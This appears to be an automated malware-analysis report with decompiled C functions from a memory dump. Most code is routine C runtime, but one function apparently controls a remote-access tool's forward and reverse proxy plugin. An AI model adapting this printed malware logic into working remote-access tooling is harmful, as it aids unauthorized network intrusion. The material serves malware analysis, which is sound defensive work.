				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E007801D9(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E007801D9(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E0077F98C(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00790810();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E0077F98C(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00790810();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E007820FC(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E00770BA0(_t130);
													}
												}
											}
										}
									}
								}
								E00770BA0(_t100);
							}
						}
					}
				}
				L63:
				return E0076FD1B(_v8 ^ _t132);
			}

0x0078e8dd
0x0078e8e4
0x0078e8ec
0x0078e8ef
0x0078e8f5
0x0078e8f8
0x0078e8fb
0x0078e8ff
0x0078e902
0x0078e907
0x0078e92e
0x00000000
0x00000000
0x00000000
0x00000000
0x0078e909
0x0078e911
0x0078e913
0x0078e917
0x0078e917
0x0078e91c
0x0078e93a
0x00000000
0x00000000
0x00000000
0x00000000
0x0078e91e
0x0078e927
0x0078e93c
0x0078e93c
0x0078e941
0x0078e948
0x0078e94b
0x0078e94b
0x0078e950
0x0078e95c
0x0078e969
0x0078e976
0x0078e989
0x00000000
0x0078e98b
0x0078e98d
0x0078e9c0
0x00000000
0x0078e9c2
0x0078e9c4
0x0078e9c8
0x0078e9ce
0x0078e9d1
0x0078e9d3
0x0078e9d6
0x0078e9d6
0x0078e9db
0x00000000
0x00000000
0x0078e9dd
0x0078e9e1
0x0078e9eb
0x0078e9f0
0x00000000
0x0078e9f2
0x00000000
0x0078e9f2
0x0078e9f0
0x00000000
0x0078e9e1
0x0078e9d6
0x0078e9d1
0x00000000
0x0078e9c8
0x0078e98f
0x0078e991
0x0078e995
0x0078e99b
0x0078e99e
0x0078e9a0
0x0078e9a0
0x0078e9a5
0x00000000
0x00000000
0x0078e9a7
0x0078e9ab
0x0078e9b5
0x0078e9ba
0x00000000
0x0078e9bc
0x00000000
0x0078e9bc
0x0078e9ba
0x00000000
0x0078e9ab
0x0078e9a0
0x0078e99e
0x00000000
0x0078e995
0x0078e98d
0x0078e978
0x0078e978
0x0078e978
0x00000000
0x0078e978
0x0078e96b
0x0078e96b
0x0078e96d
0x0078e95e
0x0078e95e
0x0078e960
0x0078e960
0x0078e9f7
0x0078e9f7
0x0078e9f7
0x0078ea04
0x0078ea0a
0x0078ea0f
0x0078e930
0x0078ea15
0x0078ea15
0x0078ea1d
0x0078ea21
0x0078ea7c
0x0078ea7e
0x00000000
0x0078ea23
0x0078ea28
0x0078ea2a
0x0078ea2c
0x0078ea34
0x0078ea58
0x0078ea5d
0x0078ea62
0x0078ea68
0x00000000
0x0078ea6e
0x0078ea6e
0x00000000
0x0078ea6e
0x0078ea36
0x0078ea38
0x0078ea3c
0x0078ea41
0x0078ea43
0x0078ea48
0x0078eb5d
0x0078eb5d
0x0078ea4e
0x0078ea4e
0x0078ea74
0x0078ea74
0x0078ea77
0x0078ea81
0x0078ea83
0x00000000
0x0078ea89
0x0078ea91
0x0078ea9f
0x00000000
0x0078eaa5
0x0078eaae
0x0078eab4
0x0078eab9
0x00000000
0x0078eabf
0x0078eabf
0x0078eac2
0x0078eac7
0x0078eacb
0x0078eb17
0x00000000
0x0078eacd
0x0078ead2
0x0078ead4
0x0078ead6
0x0078eade
0x0078eafb
0x0078eb05
0x0078eb07
0x0078eb0a
0x00000000
0x0078eb0c
0x0078eb0c
0x00000000
0x0078eb0c
0x0078eae0
0x0078eae2
0x0078eae6
0x0078eaeb
0x0078eaef
0x0078eb51
0x0078eb51
0x0078eaf1
0x0078eaf1
0x0078eb12
0x0078eb12
0x0078eb19
0x0078eb1b
0x00000000
0x0078eb34
0x0078eb34
0x0078eb4d
0x0078eb4d
0x0078eb1b
0x0078eaef
0x0078eade
0x0078eb55
0x0078eb5a
0x0078eab9
0x0078ea9f
0x0078ea83
0x0078ea48
0x0078ea34
0x0078eb61
0x0078eb67
0x0078ea0f
0x0078e950
0x0078e91c
0x0078eb69
0x0078eb7c

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0078E981
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0078EA04
__alloca_probe_16.LIBCMT ref: 0078EA3C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0078EBAE,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0078EA97
__alloca_probe_16.LIBCMT ref: 0078EAE6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0078EAAE

Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0078EB2A
__freea.LIBCMT ref: 0078EB55
__freea.LIBCMT ref: 0078EB61

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
String ID:
API String ID: 3256262068-0
Opcode ID: e56415624df41af468b43cc49504185334bd6a8fd2c0a7ff70d00d3130e3d766
Instruction ID: b3884724b9d4094c9cee648a831372513d12c52ccf15590d7176cacc61967646
Opcode Fuzzy Hash: e56415624df41af468b43cc49504185334bd6a8fd2c0a7ff70d00d3130e3d766
Instruction Fuzzy Hash: 63910672E802169EDF20AF64CC85EEEBBB5AF09750F144669E805E7191E77CEC40C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0077E9CE, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0077E9CE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00781CE2(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = E0077E118(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E0077F98C(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xb94f
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E007815D4(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E0077698A();
									asm("int3");
									_t169 =  *0x7ab508; // 0x0
									return _t169;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = E0077DE25(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = E007893AC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x797410, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E007737C1( &_v528,  *0x7aa170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x797350; // 0x74dd8c
									 *0x793474(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x7aa2a8;
										if(_t228 != 0x7aa2a8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												E007801F5( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												E007801F5( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xb94f
												E007801F5( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xb94f
										E007801F5( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										E007801F5(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E0076FD1B(_v8 ^ _t262);
				}
				L47:
			}

0x0077e9d1
0x0077e9d9
0x0077e9e0
0x0077e9e3
0x0077e9e4
0x0077e9e7
0x0077e9eb
0x0077e9ec
0x0077e9ef
0x0077e9ff
0x0077ea0b
0x0077ea22
0x0077ea27
0x0077ea2c
0x0077ea41
0x0077ea44
0x0077ea44
0x0077ea47
0x0077ea4d
0x0077ea56
0x0077ea58
0x0077ea5b
0x0077ea62
0x0077ea65
0x0077ea6b
0x00000000
0x00000000
0x0077ea6d
0x0077ea71
0x0077ea9a
0x0077ea9a
0x0077ea73
0x0077ea73
0x0077ea77
0x0077ea7b
0x0077ea82
0x0077ea88
0x00000000
0x0077ea8a
0x0077ea8a
0x0077ea8d
0x0077ea90
0x0077ea98
0x00000000
0x00000000
0x00000000
0x00000000
0x0077ea98
0x0077ea88
0x0077eaa7
0x0077eaa7
0x0077eaa9
0x0077eaaf
0x0077eab5
0x0077eab8
0x0077eab8
0x0077eabb
0x0077eabe
0x0077eabe
0x0077eace
0x0077eadc
0x0077eae1
0x0077eae8
0x0077eaea
0x00000000
0x0077eaf0
0x0077eaf6
0x0077eafc
0x0077eb03
0x0077eb09
0x0077eb0c
0x0077eb12
0x0077eb1f
0x0077eb26
0x0077eb2b
0x0077eb2e
0x0077eb30
0x0077ed89
0x0077ed8f
0x0077ed90
0x0077ed91
0x0077ed92
0x0077ed93
0x0077ed94
0x0077ed99
0x0077ed9a
0x0077ed9f
0x0077eb36
0x0077eb36
0x0077eb44
0x0077eb47
0x0077eb62
0x0077eb69
0x0077eb6f
0x0077eb75
0x0077eb49
0x0077eb49
0x0077eb51
0x00000000
0x0077eb53
0x0077eb53
0x0077eb59
0x0077eb59
0x0077eb51
0x0077eb7c
0x0077eb7f
0x0077ec9c
0x0077ec9f
0x0077ecac
0x0077ecaf
0x0077ecb7
0x0077ecb7
0x0077eca1
0x0077eca7
0x0077eca7
0x0077eb85
0x0077eb85
0x0077eb8b
0x0077eb93
0x0077eb95
0x0077eb98
0x0077eba1
0x0077ebaa
0x0077ebb0
0x0077ebb0
0x0077ebb3
0x0077ebb5
0x00000000
0x00000000
0x0077ebb7
0x0077ebbd
0x0077ebbe
0x0077ebc9
0x0077ebd1
0x0077ebd9
0x0077ebdc
0x0077ebdf
0x0077ebe5
0x0077ebeb
0x0077ebf1
0x0077ebf7
0x0077ebfa
0x00000000
0x00000000
0x0077ebfc
0x0077ec21
0x0077ec21
0x0077ec24
0x0077ec28
0x0077ec41
0x0077ec46
0x0077ec49
0x0077ec4b
0x0077ec51
0x0077ec8c
0x0077ec53
0x0077ec53
0x0077ec58
0x0077ec60
0x0077ec61
0x0077ec61
0x0077ec78
0x0077ec7f
0x0077ec82
0x0077ec87
0x0077ec87
0x0077ec8f
0x0077ec92
0x0077ec92
0x0077ec97
0x00000000
0x0077ec97
0x0077ebfe
0x0077ec00
0x0077ec05
0x0077ec0b
0x0077ec14
0x0077ec1d
0x0077ec1d
0x00000000
0x0077ec00
0x0077ecba
0x0077ecba
0x0077ecbe
0x0077ecc6
0x0077eccc
0x0077eccf
0x0077ecd5
0x0077ecd7
0x0077ed17
0x0077ed1d
0x0077ed24
0x0077ed24
0x0077ed2a
0x0077ed2e
0x00000000
0x0077ed30
0x0077ed30
0x0077ed34
0x0077ed39
0x0077ed3d
0x0077ed42
0x0077ed49
0x0077ed57
0x0077ed5d
0x0077ed60
0x0077ed60
0x0077ed2e
0x0077ed6f
0x0077ed77
0x0077ed80
0x0077ecd9
0x0077ecdf
0x0077ece2
0x0077ece9
0x0077ecfb
0x0077ed02
0x0077ed0f
0x00000000
0x0077ed0f
0x00000000
0x0077ecd7
0x0077eb30
0x0077eaab
0x00000000
0x0077eaab
0x00000000
0x0077eaa9
0x0077eaa2
0x0077eaa4
0x0077eaa4
0x00000000
0x0077ea2e
0x0077ea2e
0x0077ea30
0x0077ea40
0x0077ea40
0x00000000

APIs

Part of subcall function 00781CE2: GetLastError.KERNEL32(00000000,?,00775545,?,?,?,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781CE6
Part of subcall function 00781CE2: _free.LIBCMT ref: 00781D19
Part of subcall function 00781CE2: SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D5A
Part of subcall function 00781CE2: _abort.LIBCMT ref: 00781D60

_memcmp.LIBVCRUNTIME ref: 0077EC78
_free.LIBCMT ref: 0077ECE9
_free.LIBCMT ref: 0077ED02
_free.LIBCMT ref: 0077ED34
_free.LIBCMT ref: 0077ED3D
_free.LIBCMT ref: 0077ED49

Strings

C, xrefs: 0077EB36

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 30c4e7cd16295351988e3adb3bbd452a7c8fcd1461c21603fba8a7ec9a55e173
Instruction ID: f87e64742c4d5c68cbc1a841e68046407d0bf6da743729fa0186181c3f56b747
Opcode Fuzzy Hash: 30c4e7cd16295351988e3adb3bbd452a7c8fcd1461c21603fba8a7ec9a55e173
Instruction Fuzzy Hash: FCB12775A01219DFDB25DF18C888AADB7B4FB48354F1085EAE94DA7350E734AE90CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0074EEA8, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0074EEA8(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t24;
				void* _t30;
				char* _t32;
				char* _t35;
				intOrPtr _t48;
				char* _t49;
				char* _t56;
				char* _t61;
				void* _t64;
				intOrPtr _t117;
				void* _t121;
				void* _t124;
				void* _t126;
				void* _t127;
				void* _t129;
				signed int _t131;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t140;

				_t142 = __eflags;
				_t107 = __edx;
				_push(_t64);
				_t117 = _a4;
				E007420EC(_t64,  &_v76, __edx, __eflags, _t117 + 0x1c);
				SetEvent( *(_t117 + 0x34));
				_t24 = E00741F95( &_v80);
				E007442A6( &_v80,  &_v56, 4, 0xffffffff);
				_t134 = (_t131 & 0xfffffff8) - 0x3c;
				E007420EC(0x7ac238, _t134, _t107, _t142, 0x7ac238);
				_t135 = _t134 - 0x18;
				E007420EC(0x7ac238, _t135, _t107, _t142,  &_v72);
				_t30 = E00757478( &_v112, _t107);
				_t136 = _t135 + 0x30;
				_t121 =  *_t24 - 0x46;
				if(_t121 == 0) {
					E00741E49( &_v88, _t107, __eflags, 1);
					_t32 = E00742489();
					E00741F95(E00741E49( &_v92, _t107, __eflags, 1));
					_t108 = _t32;
					_t35 = E0074F69B();
					_t123 = _t35;
					__eflags = _t35;
					if(__eflags == 0) {
						_t124 = _t136 - 0x18;
						_push("1");
						L19:
						_t107 = E00742FB7( &_v32, E00741E49( &_v88, _t108, __eflags, 0), 0x7ac238);
						E00745343(0x7ac238, _t124, _t37, _t117, __eflags);
						_push(0x85);
						E00744AA4(0x7ac238, _t117, _t37, __eflags);
						E00741FC7();
						L20:
						E00741E74( &_v108, _t107);
						E00741FC7();
						E00741FC7();
						return 0;
					}
					 *0x7abd3c = E0074F931(_t123, "StartForward");
					 *0x7abd38 = E0074F931(_t123, "StartReverse");
					 *0x7abd40 = E0074F931(_t123, "StopForward");
					_t48 = E0074F931(_t123, "StopReverse");
					_t108 = "GetDirectListeningPort";
					 *0x7abd48 = _t48;
					_t49 = E0074F931(_t123, "GetDirectListeningPort");
					__eflags =  *0x7abd3c;
					 *0x7abd44 = _t49;
					if(__eflags == 0) {
						L17:
						_t124 = _t136 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x7abd38;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x7abd40;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t49;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x7abd4c = 1;
					E007420EC(0x7ac238, _t136 - 0x18, "GetDirectListeningPort", __eflags, E00741E49( &_v88, "GetDirectListeningPort", __eflags, 0));
					_push(0x76);
					L10:
					E00744AA4(0x7ac238, _t117, _t108, __eflags);
					goto L20;
				}
				_t126 = _t121 - 1;
				if(_t126 == 0) {
					_t56 =  *0x7abd3c(E00776769(_t53, E00741F95(E00741E49( &_v88, _t107, __eflags, 0))));
					_t140 = _t136 - 0x14;
					L9:
					_t108 = _t56;
					E00757226(0x7ac238, _t140, _t56);
					_push(0x77);
					goto L10;
				}
				_t127 = _t126 - 1;
				if(_t127 == 0) {
					__imp__#12( *0x7ac78c);
					_t61 =  *0x7abd38(_t30, E00776769(_t58, E00741F95(E00741E49( &_v92, _t107, __eflags, 0))) & 0x0000ffff);
					__eflags = _t61;
					_t105 =  !=  ? 1 :  *0x7abd4d & 0x000000ff;
					 *0x7abd4d =  !=  ? 1 :  *0x7abd4d & 0x000000ff;
					_t108 = _t61;
					E00757226(0x7ac238, _t136 - 0x10, _t61);
					_push(0x78);
					goto L10;
				}
				_t129 = _t127 - 1;
				if(_t129 == 0) {
					_t56 =  *0x7abd40();
					_t140 = _t136 - 0x18;
					goto L9;
				}
				if(_t129 == 1) {
					 *0x7abd48();
					 *0x7abd4d = 0;
				}
				goto L20;
			}

0x0074eea8
0x0074eea8
0x0074eeb5
0x0074eeb8
0x0074eebf
0x0074eec7
0x0074eed1
0x0074eee5
0x0074eeea
0x0074eef5
0x0074eefa
0x0074ef04
0x0074ef0d
0x0074ef12
0x0074ef15
0x0074ef18
0x0074efee
0x0074eff5
0x0074f009
0x0074f00e
0x0074f012
0x0074f017
0x0074f019
0x0074f01b
0x0074f0c8
0x0074f0ca
0x0074f0cf
0x0074f0e7
0x0074f0eb
0x0074f0f1
0x0074f0f8
0x0074f101
0x0074f106
0x0074f10a
0x0074f113
0x0074f11c
0x0074f129
0x0074f129
0x0074f032
0x0074f043
0x0074f054
0x0074f05b
0x0074f060
0x0074f065
0x0074f06c
0x0074f071
0x0074f078
0x0074f07d
0x0074f0b9
0x0074f0bc
0x0074f0be
0x00000000
0x0074f0be
0x0074f07f
0x0074f086
0x00000000
0x00000000
0x0074f088
0x0074f08f
0x00000000
0x00000000
0x0074f091
0x0074f093
0x00000000
0x00000000
0x0074f09b
0x0074f0ad
0x0074f0b2
0x0074efdc
0x0074efde
0x00000000
0x0074efde
0x0074ef1e
0x0074ef21
0x0074efc8
0x0074efce
0x0074efd1
0x0074efd1
0x0074efd5
0x0074efda
0x00000000
0x0074efda
0x0074ef27
0x0074ef2a
0x0074ef5d
0x0074ef83
0x0074ef93
0x0074ef95
0x0074ef9b
0x0074efa1
0x0074efa5
0x0074efaa
0x00000000
0x0074efaa
0x0074ef2c
0x0074ef2f
0x0074ef4c
0x0074ef52
0x00000000
0x0074ef52
0x0074ef34
0x0074ef3a
0x0074ef40
0x0074ef40
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 0074EEC7
inet_ntoa.WS2_32 ref: 0074EF5D

Strings

StartForward, xrefs: 0074F021
StopForward, xrefs: 0074F03E
GetDirectListeningPort, xrefs: 0074F060
StopReverse, xrefs: 0074F04F
StartReverse, xrefs: 0074F02D

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

